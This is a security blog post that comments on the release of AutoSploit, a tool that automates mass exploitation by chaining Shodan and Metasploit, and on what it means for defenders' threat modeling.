AutoSploit: The Collapse of Threat Modeling

Our world has always had “script kiddies”, beginner hackers with no real purpose or agenda, using publicly available automated tools for easy attacks. Normally, those attacks are easily found and prevented, but last week they got the equivalent of weapons of mass destruction. For years, the barrier to entry to a career in vulnerability assessments and penetration testing was knowledge of how to use advanced tools, but AutoSploit removes that barrier by combining multiple tools and automating the attack from beginning to end.

AutoSploit is open source, based on Python, and leverages both the internet scanning engine, Shodan, and open source exploit framework, Metasploit. The program takes Shodan search queries and drops their IPs into a text file. That is picked up by the Metasploit module and allows the user to select specific vulnerabilities to target, or use the “Hail Mary” option which throws every single available exploit at the targets. Basically, its a mass-attack tool with text based targeting.

As security professionals, we spend hundreds of hours per year creating very specific threat models, how attacks are facilitated, how we respond to them, and how we prevent those holes from opening in our environments. AutoSploit takes that whole playbook and tosses it in favor or brute-force, open-source attacks. For decades, there has been a chess game between attackers and defenders, the attackers try to gain access to the network as quietly as possible, the defenders try to detect and stop them. There is no sense of stealth with AutoSploit. Using the “Hail Mary” option, as almost all inexperienced attackers will, will set off all kinds of alarms in the environment.

The code itself isn’t particularly complex. It has just over 400 lines of Python but most of that is API calls to Shodan and command line calls to Metasploit. There are already scripts available to automate that code. The most interesting part is that the author(s) used both tabs and spaces in their indentations, so its entirely possible the code was cherry-picked and copy/pasted from other sources.

This isn’t the first time this has happened. In 2006, the release of Metasploit caused outrage because security professionals thought it went too far. Now Metasploit is an important tool in our toolbox, and is being professionally supported by Rapid7. In 2009, the creation of Shodan started a new generation of internet scanning, and now it has paid API support for high-volume queries.

Our carefully crafted threat models will be thrown out the window because some kids are bored and running Python scripts.


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.